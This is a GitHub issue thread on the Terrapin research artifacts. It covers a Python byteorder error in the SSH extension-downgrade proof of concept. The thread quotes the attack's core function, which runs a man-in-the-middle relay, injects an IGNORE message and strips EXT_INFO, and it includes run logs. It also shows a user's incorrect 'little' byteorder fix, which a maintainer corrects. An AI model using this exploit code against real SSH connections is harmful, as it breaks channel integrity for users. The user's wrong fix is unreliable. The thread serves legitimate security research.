RUB-NDS / Terrapin-Artifacts

This repository contains the artifacts for the paper "Terrapin Attack: Breaking SSH Channel Integrity By Sequence Number Manipulation".
https://terrapin-attack.com
Apache License 2.0

ext_downgrade_chacha20_poly1305.py: TypeError: from_bytes() missing required argument #1

Closed charlesmanser closed 6 months ago

charlesmanser commented 7 months ago

Issue running ext_downgrade_chacha20_poly1305.py

Traceback (most recent call last):
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
    perform_attack(client_socket, server_socket)
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)

Running on:

[root@cm-terrapin ext-downgrade]# cat /etc/*elease
NAME="Rocky Linux"
VERSION="9.2 (Blue Onyx)"
ID="rocky"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.2"
PLATFORM_ID="platform:el9"
PRETTY_NAME="Rocky Linux 9.2 (Blue Onyx)"
ANSI_COLOR="0;32"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:rocky:rocky:9::baseos"
HOME_URL="https://rockylinux.org/"
BUG_REPORT_URL="https://bugs.rockylinux.org/"
SUPPORT_END="2032-05-31"
ROCKY_SUPPORT_PRODUCT="Rocky-Linux-9"
ROCKY_SUPPORT_PRODUCT_VERSION="9.2"
REDHAT_SUPPORT_PRODUCT="Rocky Linux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.2"
Rocky Linux release 9.2 (Blue Onyx)
Rocky Linux release 9.2 (Blue Onyx)
Rocky Linux release 9.2 (Blue Onyx)
[root@cm-terrapin ext-downgrade]# python -V
Python 3.9.16

charlesmanser commented 7 months ago

Specifying "little" as the byteorder seems to have resolved the issue:

def perform_attack(client_socket, server_socket):
    # Version exchange
    client_vex = client_socket.recv(255)
    server_vex = server_socket.recv(255)
    client_socket.send(server_vex)
    server_socket.send(client_vex)
    # SSH_MSG_KEXINIT
    client_kexinit = client_socket.recv(35000)
    server_kexinit = server_socket.recv(35000)
    client_socket.send(server_kexinit)
    server_socket.send(client_kexinit)
    # Client will now send the key exchange INIT
    client_kex_init = client_socket.recv(35000)
    server_socket.send(client_kex_init)
    # Insert ignore message (to client)
    client_socket.send(rogue_msg_ignore)
    # Wait half a second here to avoid missing EXT_INFO
    # Can be solved by counting bytes as well
    sleep(0.5)
    # KEX_REPLY / NEW_KEYS / EXT_INFO
    server_response = server_socket.recv(35000)
    # Strip EXT_INFO before forwarding server_response to client
    # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
    byteorder = "little"
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_newkeys_start = server_kex_reply_length
    server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_extinfo_start = server_newkeys_start + server_newkeys_length
    client_socket.send(server_response[:server_extinfo_start])

Sudococommunity commented 7 months ago

How did you get the issue? Tell me the steps you've followed so that I can regenerate the issue.

charlesmanser commented 7 months ago

  1. Git clone the repo
  2. Edit script to point to new target
  3. Attempt to run /root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py
  4. Initiate an SSH connection to localhost
  5. Error

[root@cm-terrapin ext-downgrade]# python ext_downgrade_chacha20_poly1305.py
--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---
[+] MitM Proxy started. Listening on ('127.0.0.1', 2222) for incoming connections...
[+] Accepted connection from: ('127.0.0.1', 46684)
[+] Establishing new target connection to ('10.32.152.27', 22).
[+] Performing extension downgrade
Traceback (most recent call last):
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
    perform_attack(client_socket, server_socket)
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)

TrueSkrillor commented 6 months ago

The default argument value for byteorder was added in Python 3.11. Using a Python version < 3.11 will yield the error mentioned above, as byteorder is required and no default argument value is set. Note that Python 3.11 and newer will default to byteorder = 'big', which is correct in this context (network byte order). Setting byteorder = 'little' may cause unexpected behavior due to wrong byte order conversion.

I will update the PoCs with an explicit byteorder = 'big' argument. To avoid this issue entirely, you may update your Python version to 3.11 or newer.
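
The byte-order point above, as an added example that is not part of the original thread or the repository's code: a framing parser for cleartext SSH binary packets that passes byteorder explicitly and rejects implausible lengths. The helper names, the 35000-byte sanity bound and the sample buffer are assumptions constructed for illustration.

```python
import struct

LENGTH_FIELD_LENGTH = 4    # uint32 packet_length, network byte order (RFC 4253, section 6)
MAX_PACKET_LENGTH = 35000  # assumed sanity bound, same value as the recv() size in the PoC


def build_packet(payload: bytes, block_size: int = 8) -> bytes:
    """Frame a cleartext SSH binary packet (constructed test data, zero padding)."""
    padding = block_size - ((LENGTH_FIELD_LENGTH + 1 + len(payload)) % block_size)
    if padding < 4:  # RFC 4253 requires at least four bytes of padding
        padding += block_size
    packet_length = 1 + len(payload) + padding
    return struct.pack(">IB", packet_length, padding) + payload + bytes(padding)


def split_packets(buf: bytes, byteorder: str = "big") -> list:
    """Split back-to-back cleartext packets using their length fields."""
    packets, offset = [], 0
    while offset < len(buf):
        header = buf[offset:offset + LENGTH_FIELD_LENGTH]
        if len(header) < LENGTH_FIELD_LENGTH:
            raise ValueError(f"truncated length field at offset {offset}")
        # Explicit byteorder works on every Python 3 version, not only 3.11+.
        length = int.from_bytes(header, byteorder=byteorder)
        end = offset + LENGTH_FIELD_LENGTH + length
        if length > MAX_PACKET_LENGTH or end > len(buf):
            raise ValueError(f"implausible packet_length {length} at offset {offset}")
        packets.append(buf[offset:end])
        offset = end
    return packets


def message_type(packet: bytes) -> int:
    """First payload byte, located after packet_length and padding_length."""
    return packet[LENGTH_FIELD_LENGTH + 1]


# Constructed sample: a 41-byte payload with message number 31, then NEWKEYS (21).
SAMPLE_BUFFER = build_packet(bytes([31]) + bytes(40)) + build_packet(bytes([21]))

if __name__ == "__main__":
    print([(len(p), message_type(p)) for p in split_packets(SAMPLE_BUFFER)])
    try:
        split_packets(SAMPLE_BUFFER, byteorder="little")
    except ValueError as exc:
        print("little-endian parse rejected:", exc)
```

With byteorder="little" the first length field 00 00 00 34 decodes to 872415232 instead of 52, so every offset derived from it is wrong; the bounds check turns that into an error rather than a silent mis-slice.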

TrueSkrillor commented 6 months ago

I have added the explicit byteorder = 'big' argument in https://github.com/RUB-NDS/Terrapin-Artifacts/commit/8a2416c82ebd2a1a097c11f513bbab73db55798e, which should fix this issue. Feel free to reopen in case your issue persists.